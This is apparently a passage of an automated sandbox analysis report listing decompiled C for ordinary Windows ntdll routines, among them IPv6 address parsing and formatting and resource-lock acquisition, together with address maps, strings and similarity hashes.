CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 00A83EC4
Execute=1, xrefs: 00A83F5E
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 00A8E2FB
ExecuteOptions, xrefs: 00A83F04

Memory Dump Source

Source File: 0000000C.00000002.661014357.0000000000A20000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: true

Associated: 0000000C.00000002.661005017.0000000000A10000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661091576.0000000000B00000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661097627.0000000000B10000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661103096.0000000000B14000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661108198.0000000000B17000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661113209.0000000000B20000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661144031.0000000000B80000.00000040.00000001.sdmp Download File

Similarity

API ID: BaseDataModuleQuery
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 3901378454-484625025
Opcode ID: 080e795c3001f422dfa51e1d19a0e3e1948f7e55d9154d9ddc4186c933c4abae
Instruction ID: 30542117c3fa3fb4fd26b2e8cedbfccadba597b8f65ad4cda1ec70855ac57f7e
Opcode Fuzzy Hash: 080e795c3001f422dfa51e1d19a0e3e1948f7e55d9154d9ddc4186c933c4abae
Instruction Fuzzy Hash: 7A418772A5021CBADF20EB94DCC6FDE73BCAB54714F0005A9B605E6191EB709F45CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00A70B15, Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A70B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void* _t108;
				void* _t116;
				char _t120;
				short _t121;
				void* _t128;
				intOrPtr* _t130;
				char _t132;
				short _t133;
				intOrPtr _t141;
				signed int _t156;
				signed int _t174;
				intOrPtr _t177;
				intOrPtr* _t179;
				intOrPtr _t180;
				void* _t183;

				_t179 = _a4;
				_t141 =  *_t179;
				_v16 = 0;
				_v28 = 0;
				_v8 = 0;
				_v24 = 0;
				_v12 = 0;
				_v32 = 0;
				_v20 = 0;
				if(_t141 == 0) {
					L41:
					 *_a8 = _t179;
					_t180 = _v24;
					if(_t180 != 0) {
						if(_t180 != 3) {
							goto L6;
						}
						_v8 = _v8 + 1;
					}
					_t174 = _v32;
					if(_t174 == 0) {
						if(_v8 == 7) {
							goto L43;
						}
						goto L6;
					}
					L43:
					if(_v16 != 1) {
						if(_v16 != 2) {
							goto L6;
						}
						 *((short*)(_a12 + _v20 * 2)) = 0;
						L47:
						if(_t174 != 0) {
							E00A48980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
							_t116 = 8;
							E00A3DFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
						}
						return 0;
					}
					if(_t180 != 0) {
						if(_v12 > 3) {
							goto L6;
						}
						_t120 = E00A70CFA(_v28, 0, 0xa);
						_t183 = _t183 + 0xc;
						if(_t120 > 0xff) {
							goto L6;
						}
						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
						goto L47;
					}
					if(_v12 > 4) {
						goto L6;
					}
					_t121 = E00A70CFA(_v28, _t180, 0x10);
					_t183 = _t183 + 0xc;
					 *((short*)(_a12 + _v20 * 2)) = _t121;
					goto L47;
				} else {
					while(1) {
						_t123 = _v16;
						if(_t123 == 0) {
							goto L7;
						}
						_t108 = _t123 - 1;
						if(_t108 != 0) {
							goto L1;
						}
						_t178 = _t141;
						if(E00A706BA(_t108, _t141) == 0 || _t135 == 0) {
							if(E00A706BA(_t135, _t178) == 0 || E00A70A5B(_t136, _t178) == 0) {
								if(_t141 != 0x3a) {
									if(_t141 == 0x2e) {
										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
											goto L41;
										} else {
											_v24 = _v24 + 1;
											L27:
											_v16 = _v16 & 0x00000000;
											L28:
											if(_v28 == 0) {
												goto L20;
											}
											_t177 = _v24;
											if(_t177 != 0) {
												if(_v12 > 3) {
													L6:
													return 0xc000000d;
												}
												_t132 = E00A70CFA(_v28, 0, 0xa);
												_t183 = _t183 + 0xc;
												if(_t132 > 0xff) {
													goto L6;
												}
												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
												goto L20;
											}
											if(_v12 > 4) {
												goto L6;
											}
											_t133 = E00A70CFA(_v28, 0, 0x10);
											_t183 = _t183 + 0xc;
											_v20 = _v20 + 1;
											 *((short*)(_a12 + _v20 * 2)) = _t133;
											goto L20;
										}
									}
									goto L41;
								}
								if(_v24 > 0 || _v8 > 6) {
									goto L41;
								} else {
									_t130 = _t179 + 1;
									if( *_t130 == _t141) {
										if(_v32 != 0) {
											goto L41;
										}
										_v32 = _v8 + 1;
										_t156 = 2;
										_v8 = _v8 + _t156;
										L34:
										_t179 = _t130;
										_v16 = _t156;
										goto L28;
									}
									_v8 = _v8 + 1;
									goto L27;
								}
							} else {
								_v12 = _v12 + 1;
								if(_v24 > 0) {
									goto L41;
								}
								_a7 = 1;
								goto L20;
							}
						} else {
							_v12 = _v12 + 1;
							L20:
							_t179 = _t179 + 1;
							_t141 =  *_t179;
							if(_t141 == 0) {
								goto L41;
							}
							continue;
						}
						L7:
						if(_t141 == 0x3a) {
							if(_v24 > 0 || _v8 > 0) {
								goto L41;
							} else {
								_t130 = _t179 + 1;
								if( *_t130 != _t141) {
									goto L41;
								}
								_v20 = _v20 + 1;
								_t156 = 2;
								_v32 = 1;
								_v8 = _t156;
								 *((short*)(_a12 + _v20 * 2)) = 0;
								goto L34;
							}
						}
						L8:
						if(_v8 > 7) {
							goto L41;
						}
						_t142 = _t141;
						if(E00A706BA(_t123, _t141) == 0 || _t124 == 0) {
							if(E00A706BA(_t124, _t142) == 0 || E00A70A5B(_t125, _t142) == 0 || _v24 > 0) {
								goto L41;
							} else {
								_t128 = 1;
								_a7 = 1;
								_v28 = _t179;
								_v16 = 1;
								_v12 = 1;
								L39:
								if(_v16 == _t128) {
									goto L20;
								}
								goto L28;
							}
						} else {
							_a7 = 0;
							_v28 = _t179;
							_v16 = 1;
							_v12 = 1;
							goto L20;
						}
					}
				}
				L1:
				_t123 = _t108 == 1;
				if(_t108 == 1) {
					goto L8;
				}
				_t128 = 1;
				goto L39;
			}

0x00a70b21
0x00a70b24
0x00a70b27
0x00a70b2a
0x00a70b2d
0x00a70b30
0x00a70b33
0x00a70b36
0x00a70b39
0x00a70b3e
0x00a70c65
0x00a70c68
0x00a70c6a
0x00a70c6f
0x00a9eb42
0x00000000
0x00000000
0x00a9eb48
0x00a9eb48
0x00a70c75
0x00a70c7a
0x00a9eb54
0x00000000
0x00000000
0x00000000
0x00a9eb5a
0x00a70c80
0x00a70c84
0x00a9eb98
0x00000000
0x00000000
0x00a9eba6
0x00a70cb8
0x00a70cba
0x00a70cd3
0x00a70cda
0x00a70ce4
0x00a70ce9
0x00000000
0x00a70cec
0x00a70c8c
0x00a9eb63
0x00000000
0x00000000
0x00a9eb70
0x00a9eb75
0x00a9eb7d
0x00000000
0x00000000
0x00a9eb8c
0x00000000
0x00a9eb8c
0x00a70c96
0x00000000
0x00000000
0x00a70ca2
0x00a70cac
0x00a70cb4
0x00000000
0x00000000
0x00a70b44
0x00a70b47
0x00a70b49
0x00000000
0x00000000
0x00a70b4f
0x00a70b50
0x00000000
0x00000000
0x00a70b56
0x00a70b62
0x00a70b7c
0x00a70bac
0x00a70a0f
0x00a9eaaa
0x00000000
0x00a9eac4
0x00a9eac4
0x00a70bd0
0x00a70bd0
0x00a70bd4
0x00a70bd9
0x00000000
0x00000000
0x00a70bdb
0x00a70be0
0x00a9eb0e
0x00a70a1a
0x00000000
0x00a70a1a
0x00a9eb1a
0x00a9eb1f
0x00a9eb27
0x00000000
0x00000000
0x00a9eb36
0x00000000
0x00a9eb36
0x00a70bea
0x00000000
0x00000000
0x00a70bf6
0x00a70c00
0x00a70c03
0x00a70c0b
0x00000000
0x00a70c0b
0x00a9eaaa
0x00000000
0x00a70a15
0x00a70bb6
0x00000000
0x00a70bc6
0x00a70bc6
0x00a70bcb
0x00a70c15
0x00000000
0x00000000
0x00a70c1d
0x00a70c20
0x00a70c21
0x00a70c24
0x00a70c24
0x00a70c26
0x00000000
0x00a70c26
0x00a70bcd
0x00000000
0x00a70bcd
0x00a70b89
0x00a70b89
0x00a70b90
0x00000000
0x00000000
0x00a70b96
0x00000000
0x00a70b96
0x00a70a04
0x00a70a04
0x00a70b9a
0x00a70b9a
0x00a70b9b
0x00a70b9f
0x00000000
0x00000000
0x00000000
0x00a70ba5
0x00a70ac7
0x00a70aca
0x00a9eacf
0x00000000
0x00a9eade
0x00a9eade
0x00a9eae3
0x00000000
0x00000000
0x00a9eaf3
0x00a9eaf6
0x00a9eaf7
0x00a9eafe
0x00a9eb01
0x00000000
0x00a9eb01
0x00a9eacf
0x00a70ad0
0x00a70ad4
0x00000000
0x00000000
0x00a70ada
0x00a70ae6
0x00a70c34
0x00000000
0x00a70c47
0x00a70c49
0x00a70c4a
0x00a70c4e
0x00a70c51
0x00a70c54
0x00a70c57
0x00a70c5a
0x00000000
0x00000000
0x00000000
0x00a70c60
0x00a70afb
0x00a70afe
0x00a70b02
0x00a70b05
0x00a70b08
0x00000000
0x00a70b08
0x00a70ae6
0x00a70b44
0x00a709f8
0x00a709f8
0x00a709f9
0x00000000
0x00000000
0x00a9eaa0
0x00000000

APIs

__fassign.LIBCMT ref: 00A70BF6
__fassign.LIBCMT ref: 00A70CA2

Strings

., xrefs: 00A70A0C
:, xrefs: 00A70BA9
:, xrefs: 00A70AC7

Memory Dump Source

Source File: 0000000C.00000002.661014357.0000000000A20000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: true

Associated: 0000000C.00000002.661005017.0000000000A10000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661091576.0000000000B00000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661097627.0000000000B10000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661103096.0000000000B14000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661108198.0000000000B17000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661113209.0000000000B20000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661144031.0000000000B80000.00000040.00000001.sdmp Download File

Similarity

API ID: __fassign
String ID: .$:$:
API String ID: 3965848254-2308638275
Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
Instruction ID: d00bf9a05ace87186633b67cd3e62a755f60920a50e42e2243d46ef1f255b08d
Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
Instruction Fuzzy Hash: 07A1AC71E0030AEFCF25CF64CC55ABEB7B4AF55305F24C56AE84AA7282DB349A41CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00A70554, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E00A70554(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int* _t49;
				signed int _t51;
				signed int _t56;
				signed int _t58;
				signed int _t61;
				signed int _t63;
				void* _t66;
				intOrPtr _t67;
				void* _t69;
				signed int _t70;
				void* _t75;
				signed int _t81;
				signed int _t84;
				void* _t86;
				signed int _t93;
				signed int _t96;
				intOrPtr _t105;
				signed int _t107;
				void* _t110;
				signed int _t115;
				signed int* _t119;
				void* _t125;
				void* _t126;
				signed int _t128;
				signed int _t130;
				signed int _t138;
				signed int _t144;
				void* _t158;
				void* _t159;
				void* _t160;

				_t96 = _a4;
				_t115 =  *(_t96 + 0x28);
				_push(_t138);
				if(_t115 < 0) {
					_t105 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
						goto L6;
					} else {
						__eflags = _t115 | 0xffffffff;
						asm("lock xadd [eax], edx");
						return 1;
					}
				} else {
					L6:
					_push(_t128);
					while(1) {
						L7:
						__eflags = _t115;
						if(_t115 >= 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
							_t49 = _t96 + 0x1c;
							_t106 = 1;
							asm("lock xadd [edx], ecx");
							_t115 =  *(_t96 + 0x28);
							__eflags = _t115;
							if(_t115 < 0) {
								L23:
								_t130 = 0;
								__eflags = 0;
								while(1) {
									_t118 =  *(_t96 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x00b101c0;
									_push(_t144);
									_push(0);
									_t51 = E00A2F8CC( *((intOrPtr*)(_t96 + 0x18)));
									__eflags = _t51 - 0x102;
									if(_t51 != 0x102) {
										break;
									}
									_t106 =  *(_t144 + 4);
									_t126 =  *_t144;
									_t86 = E00A74FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
									_push(_t126);
									_push(_t86);
									E00A83F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
									E00A83F92(0x65, 0, "RTL: Resource at %p\n", _t96);
									_t130 = _t130 + 1;
									_t160 = _t158 + 0x28;
									__eflags = _t130 - 2;
									if(__eflags > 0) {
										E00AB217A(_t106, __eflags, _t96);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E00A83F92();
									_t158 = _t160 + 0xc;
								}
								__eflags = _t51;
								if(__eflags < 0) {
									_push(_t51);
									E00A73915(_t96, _t106, _t118, _t130, _t144, __eflags);
									asm("int3");
									while(1) {
										L32:
										__eflags = _a8;
										if(_a8 == 0) {
											break;
										}
										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
										_t119 = _t96 + 0x24;
										_t107 = 1;
										asm("lock xadd [eax], ecx");
										_t56 =  *(_t96 + 0x28);
										_a4 = _t56;
										__eflags = _t56;
										if(_t56 != 0) {
											L40:
											_t128 = 0;
											__eflags = 0;
											while(1) {
												_t121 =  *(_t96 + 0x30) & 0x00000001;
												asm("sbb esi, esi");
												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x00b101c0;
												_push(_t138);
												_push(0);
												_t58 = E00A2F8CC( *((intOrPtr*)(_t96 + 0x20)));
												__eflags = _t58 - 0x102;
												if(_t58 != 0x102) {
													break;
												}
												_t107 =  *(_t138 + 4);
												_t125 =  *_t138;
												_t75 = E00A74FC0(_t125, _t107, 0xff676980, 0xffffffff);
												_push(_t125);
												_push(_t75);
												E00A83F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
												E00A83F92(0x65, 0, "RTL: Resource at %p\n", _t96);
												_t128 = _t128 + 1;
												_t159 = _t158 + 0x28;
												__eflags = _t128 - 2;
												if(__eflags > 0) {
													E00AB217A(_t107, __eflags, _t96);
												}
												_push("RTL: Re-Waiting\n");
												_push(0);
												_push(0x65);
												E00A83F92();
												_t158 = _t159 + 0xc;
											}
											__eflags = _t58;
											if(__eflags < 0) {
												_push(_t58);
												E00A73915(_t96, _t107, _t121, _t128, _t138, __eflags);
												asm("int3");
												_t61 =  *_t107;
												 *_t107 = 0;
												__eflags = _t61;
												if(_t61 == 0) {
													L1:
													_t63 = E00A55384(_t138 + 0x24);
													if(_t63 != 0) {
														goto L52;
													} else {
														goto L2;
													}
												} else {
													_t123 =  *((intOrPtr*)(_t138 + 0x18));
													_push( &_a4);
													_push(_t61);
													_t70 = E00A2F970( *((intOrPtr*)(_t138 + 0x18)));
													__eflags = _t70;
													if(__eflags >= 0) {
														goto L1;
													} else {
														_push(_t70);
														E00A73915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
														L52:
														_t122 =  *((intOrPtr*)(_t138 + 0x20));
														_push( &_a4);
														_push(1);
														_t63 = E00A2F970( *((intOrPtr*)(_t138 + 0x20)));
														__eflags = _t63;
														if(__eflags >= 0) {
															L2:
															return _t63;
														} else {
															_push(_t63);
															E00A73915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
															_t109 =  *((intOrPtr*)(_t138 + 0x20));
															_push( &_a4);
															_push(1);
															_t63 = E00A2F970( *((intOrPtr*)(_t138 + 0x20)));
															__eflags = _t63;
															if(__eflags >= 0) {
																goto L2;
															} else {
																_push(_t63);
																_t66 = E00A73915(_t96, _t109, _t122, _t128, _t138, __eflags);
																asm("int3");
																while(1) {
																	_t110 = _t66;
																	__eflags = _t66 - 1;
																	if(_t66 != 1) {
																		break;
																	}
																	_t128 = _t128 | 0xffffffff;
																	_t66 = _t110;
																	asm("lock cmpxchg [ebx], edi");
																	__eflags = _t66 - _t110;
																	if(_t66 != _t110) {
																		continue;
																	} else {
																		_t67 =  *[fs:0x18];
																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
																		return _t67;
																	}
																	goto L59;
																}
																E00A55329(_t110, _t138);
																_t69 = E00A553A5(_t138, 1);
																return _t69;
															}
														}
													}
												}
											} else {
												_t56 =  *(_t96 + 0x28);
												goto L3;
											}
										} else {
											_t107 =  *_t119;
											__eflags = _t107;
											if(__eflags > 0) {
												while(1) {
													_t81 = _t107;
													asm("lock cmpxchg [edi], esi");
													__eflags = _t81 - _t107;
													if(_t81 == _t107) {
														break;
													}
													_t107 = _t81;
													__eflags = _t81;
													if(_t81 > 0) {
														continue;
													}
													break;
												}
												_t56 = _a4;
												__eflags = _t107;
											}
											if(__eflags != 0) {
												while(1) {
													L3:
													__eflags = _t56;
													if(_t56 != 0) {
														goto L32;
													}
													_t107 = _t107 | 0xffffffff;
													_t56 = 0;
													asm("lock cmpxchg [edx], ecx");
													__eflags = 0;
													if(0 != 0) {
														continue;
													} else {
														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
														return 1;
													}
													goto L59;
												}
												continue;
											} else {
												goto L40;
											}
										}
										goto L59;
									}
									__eflags = 0;
									return 0;
								} else {
									_t115 =  *(_t96 + 0x28);
									continue;
								}
							} else {
								_t106 =  *_t49;
								__eflags = _t106;
								if(__eflags > 0) {
									while(1) {
										_t93 = _t106;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t93 - _t106;
										if(_t93 == _t106) {
											break;
										}
										_t106 = _t93;
										__eflags = _t93;
										if(_t93 > 0) {
											continue;
										}
										break;
									}
									__eflags = _t106;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L23;
								}
							}
						}
						goto L59;
					}
					_t84 = _t115;
					asm("lock cmpxchg [esi], ecx");
					__eflags = _t84 - _t115;
					if(_t84 != _t115) {
						_t115 = _t84;
						goto L7;
					} else {
						return 1;
					}
				}
				L59:
			}

0x00a7055a
0x00a7055d
0x00a70563
0x00a70566
0x00a705d8
0x00a705e2
0x00a705e5
0x00000000
0x00a705e7
0x00a705e7
0x00a705ea
0x00a705f3
0x00a705f3
0x00a70568
0x00a70568
0x00a70568
0x00a70569
0x00a70569
0x00a70569
0x00a7056b
0x00000000
0x00000000
0x00a9217f
0x00a92183
0x00a9225b
0x00a9225f
0x00a92189
0x00a9218c
0x00a9218f
0x00a92194
0x00a92199
0x00a9219d
0x00a921a0
0x00a921a2
0x00a921ce
0x00a921ce
0x00a921ce
0x00a921d0
0x00a921d6
0x00a921de
0x00a921e2
0x00a921e8
0x00a921e9
0x00a921ec
0x00a921f1
0x00a921f6
0x00000000
0x00000000
0x00a921f8
0x00a921fb
0x00a92206
0x00a9220b
0x00a9220c
0x00a92217
0x00a92226
0x00a9222b
0x00a9222c
0x00a9222f
0x00a92232
0x00a92235
0x00a92235
0x00a9223a
0x00a9223f
0x00a92241
0x00a92243
0x00a92248
0x00a92248
0x00a9224d
0x00a9224f
0x00a92262
0x00a92263
0x00a92268
0x00a92269
0x00a92269
0x00a92269
0x00a9226d
0x00000000
0x00000000
0x00a92276
0x00a92279
0x00a9227e
0x00a92283
0x00a92287
0x00a9228a
0x00a9228d
0x00a9228f
0x00a922bc
0x00a922bc
0x00a922bc
0x00a922be
0x00a922c4
0x00a922cc
0x00a922d0
0x00a922d6
0x00a922d7
0x00a922da
0x00a922df
0x00a922e4
0x00000000
0x00000000
0x00a922e6
0x00a922e9
0x00a922f4
0x00a922f9
0x00a922fa
0x00a92305
0x00a92314
0x00a92319
0x00a9231a
0x00a9231d
0x00a92320
0x00a92323
0x00a92323
0x00a92328
0x00a9232d
0x00a9232f
0x00a92331
0x00a92336
0x00a92336
0x00a9233b
0x00a9233d
0x00a92350
0x00a92351
0x00a92356
0x00a92359
0x00a92359
0x00a9235b
0x00a9235d
0x00a55367
0x00a5536b
0x00a55372
0x00000000
0x00000000
0x00000000
0x00000000
0x00a92363
0x00a92363
0x00a92369
0x00a9236a
0x00a9236c
0x00a92371
0x00a92373
0x00000000
0x00a92379
0x00a92379
0x00a9237a
0x00a9237f
0x00a9237f
0x00a92385
0x00a92386
0x00a92389
0x00a9238e
0x00a92390
0x00a55378
0x00a5537c
0x00a92396
0x00a92396
0x00a92397
0x00a9239c
0x00a923a2
0x00a923a3
0x00a923a6
0x00a923ab
0x00a923ad
0x00000000
0x00a923b3
0x00a923b3
0x00a923b4
0x00a923b9
0x00a923ba
0x00a923ba
0x00a923bc
0x00a923bf
0x00000000
0x00000000
0x00a89153
0x00a89158
0x00a8915a
0x00a8915e
0x00a89160
0x00000000
0x00a89166
0x00a89166
0x00a89171
0x00a89176
0x00a89176
0x00000000
0x00a89160
0x00a923c6
0x00a923ce
0x00a923d7
0x00a923d7
0x00a923ad
0x00a92390
0x00a92373
0x00a9233f
0x00a9233f
0x00000000
0x00a9233f
0x00a92291
0x00a92291
0x00a92293
0x00a92295
0x00a9229a
0x00a922a1
0x00a922a3
0x00a922a7
0x00a922a9
0x00000000
0x00000000
0x00a922ab
0x00a922ad
0x00a922af
0x00000000
0x00000000
0x00000000
0x00a922af
0x00a922b1
0x00a922b4
0x00a922b4
0x00a922b6
0x00a553be
0x00a553be
0x00a553be
0x00a553c0
0x00000000
0x00000000
0x00a553cb
0x00a553ce
0x00a553d0
0x00a553d4
0x00a553d6
0x00000000
0x00a553d8
0x00a553e3
0x00a553ea
0x00a553ea
0x00000000
0x00a553d6
0x00000000
0x00000000
0x00000000
0x00000000
0x00a922b6
0x00000000
0x00a9228f
0x00a92349
0x00a9234d
0x00a92251
0x00a92251
0x00000000
0x00a92251
0x00a921a4
0x00a921a4
0x00a921a6
0x00a921a8
0x00a921ac
0x00a921b6
0x00a921b8
0x00a921bc
0x00a921be
0x00000000
0x00000000
0x00a921c0
0x00a921c2
0x00a921c4
0x00000000
0x00000000
0x00000000
0x00a921c4
0x00a921c6
0x00a921c6
0x00a921c8
0x00000000
0x00000000
0x00000000
0x00000000
0x00a921c8
0x00a921a2
0x00000000
0x00a92183
0x00a7057b
0x00a7057d
0x00a70581
0x00a70583
0x00a92178
0x00000000
0x00a70589
0x00a7058f
0x00a7058f
0x00a70583
0x00000000

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A92206

Strings

RTL: Re-Waiting, xrefs: 00A9223A, 00A92328
RTL: Resource at %p, xrefs: 00A9221D, 00A9230B
RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 00A922FC
RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 00A9220E

Memory Dump Source

Source File: 0000000C.00000002.661014357.0000000000A20000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: true

Associated: 0000000C.00000002.661005017.0000000000A10000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661091576.0000000000B00000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661097627.0000000000B10000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661103096.0000000000B14000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661108198.0000000000B17000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661113209.0000000000B20000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661144031.0000000000B80000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-4236105082
Opcode ID: 94778b5b8187e08b74182e06d28001f2f816855830433bd5667ba670fab7bf80
Instruction ID: 6cb4496eeb64cdab9d1a2162025098d85157bd5944a1d5ce6f6b8789a53cf350
Opcode Fuzzy Hash: 94778b5b8187e08b74182e06d28001f2f816855830433bd5667ba670fab7bf80
Instruction Fuzzy Hash: F3510876B002117FEF14DB18DC81FA673E9AB98720F218269FD59DF286DA71EC418790

Uniqueness

Uniqueness Score: -1.00%

Function 00A714C0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E00A714C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				char _v10;
				char _v140;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				void* _t26;
				signed int _t29;
				signed int _t34;
				signed int _t40;
				intOrPtr _t45;
				void* _t51;
				intOrPtr* _t52;
				void* _t54;
				signed int _t57;
				void* _t58;

				_t51 = __edx;
				_t24 =  *0xb12088; // 0x766f8297
				_v8 = _t24 ^ _t57;
				_t45 = _a16;
				_t53 = _a4;
				_t52 = _a20;
				if(_a4 == 0 || _t52 == 0) {
					L10:
					_t26 = 0xc000000d;
				} else {
					if(_t45 == 0) {
						if( *_t52 == _t45) {
							goto L3;
						} else {
							goto L10;
						}
					} else {
						L3:
						_t28 =  &_v140;
						if(_a12 != 0) {
							_push("[");
							_push(0x41);
							_push( &_v140);
							_t29 = E00A67707();
							_t58 = _t58 + 0xc;
							_t28 = _t57 + _t29 * 2 - 0x88;
						}
						_t54 = E00A713CB(_t53, _t28);
						if(_a8 != 0) {
							_t34 = E00A67707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t34 * 2;
						}
						if(_a12 != 0) {
							_t40 = E00A67707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t40 * 2;
						}
						_t53 = (_t54 -  &_v140 >> 1) + 1;
						 *_t52 = _t53;
						if( *_t52 < _t53) {
							goto L10;
						} else {
							E00A32340(_t45,  &_v140, _t53 + _t53);
							_t26 = 0;
						}
					}
				}
				return E00A3E1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
			}

0x00a714c0
0x00a714cb
0x00a714d2
0x00a714d6
0x00a714da
0x00a714de
0x00a714e3
0x00a7157a
0x00a7157a
0x00a714f1
0x00a714f3
0x00a9ea0f
0x00000000
0x00a9ea15
0x00000000
0x00a9ea15
0x00a714f9
0x00a714f9
0x00a714fe
0x00a71504
0x00a9ea1a
0x00a9ea1f
0x00a9ea21
0x00a9ea22
0x00a9ea27
0x00a9ea2a
0x00a9ea2a
0x00a71515
0x00a71517
0x00a7156d
0x00a71572
0x00a71575
0x00a71575
0x00a7151e
0x00a9ea50
0x00a9ea55
0x00a9ea58
0x00a9ea58
0x00a7152e
0x00a71531
0x00a71533
0x00000000
0x00a71535
0x00a71541
0x00a71549
0x00a71549
0x00a71533
0x00a714f3
0x00a71559

APIs

___swprintf_l.LIBCMT ref: 00A9EA22

Part of subcall function 00A713CB: ___swprintf_l.LIBCMT ref: 00A7146B
Part of subcall function 00A713CB: ___swprintf_l.LIBCMT ref: 00A71490

___swprintf_l.LIBCMT ref: 00A7156D

Strings

]:%u, xrefs: 00A9EA47
%%%u, xrefs: 00A71564

Memory Dump Source

Source File: 0000000C.00000002.661014357.0000000000A20000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: true

Associated: 0000000C.00000002.661005017.0000000000A10000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661091576.0000000000B00000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661097627.0000000000B10000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661103096.0000000000B14000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661108198.0000000000B17000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661113209.0000000000B20000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661144031.0000000000B80000.00000040.00000001.sdmp Download File

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
